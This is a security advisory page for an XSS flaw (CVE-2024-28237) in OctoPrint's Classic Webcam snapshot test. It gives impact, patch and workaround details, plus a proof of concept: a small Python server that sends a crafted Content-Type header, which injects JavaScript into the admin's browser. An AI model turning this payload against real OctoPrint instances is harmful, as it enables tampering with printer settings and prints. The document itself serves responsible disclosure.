Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS14N21mLXdyaDktcjc2Y84AA6Gj

XSS via the "Snapshot Test" feature in Classic Webcam plugin settings

Impact

OctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to configure or talk a victim with administrator rights into configuring a webcam snapshot URL which when tested through the "Test" button included in the web interface will execute JavaScript code in the victims browser when attempting to render the snapshot image.

An attacker who successfully talked a victim with admin rights into performing a snapshot test with such a crafted URL could use this to retrieve or modify sensitive configuration settings, interrupt prints or otherwise interact with the OctoPrint instance in a malicious way.

Patches

The vulnerability will be patched in version 1.10.0.

Workaround

OctoPrint administrators are strongly advised to thoroughly vet who has admin access to their installation and what settings they modify based on instructions by strangers.

PoC

Below are the steps to reproduce the vulnerability:

  1. Create a URL that responds with a malicious content type. For example, creating the following python script:

    from http.server import BaseHTTPRequestHandler, HTTPServer
    
    class MyHTTPRequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header('Content-Type', 'image/"onerror="alert(1)"')
            self.end_headers()
            self.wfile.write(b'Ok')
    
    def run():
        server_address = ('', 8080)
        httpd = HTTPServer(server_address, MyHTTPRequestHandler)
        print('Server listening on 0.0.0.0:8080...')
        httpd.serve_forever()
    
    if __name__ == '__main__':
        run()
    
  2. Go to OctoPrint settings --> Plugins --> Classic Webcam and enter the URL of that page as the Snapshot URL.

  3. Click on the "Test" button to trigger XSS. A Javascript alert should appear, demonstrating the actual code injection.

Credits

This vulnerability was discovered and responsibly disclosed to OctoPrint by Jacopo Tediosi.

Permalink: https://github.com/advisories/GHSA-x7mf-wrh9-r76c
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14N21mLXdyaDktcjc2Y84AA6Gj
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: about 1 month ago
Updated: about 1 month ago


CVSS Score: 4.0
CVSS vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

Identifiers: GHSA-x7mf-wrh9-r76c, CVE-2024-28237
References: Repository: https://github.com/OctoPrint/OctoPrint
Blast Radius: 3.1

Affected Packages

pypi:OctoPrint
Dependent packages: 1
Dependent repositories: 6
Downloads: 11,997 last month
Affected Version Ranges: <= 1.9.3
Fixed in: 1.10.0rc3
All affected versions: 1.3.11, 1.3.12, 1.4.0, 1.4.1, 1.4.2, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.6.0, 1.6.1, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.8.0, 1.8.1, 1.8.2, 1.8.3, 1.8.4, 1.8.5, 1.8.6, 1.8.7, 1.9.0, 1.9.1, 1.9.2, 1.9.3
All unaffected versions: 1.10.0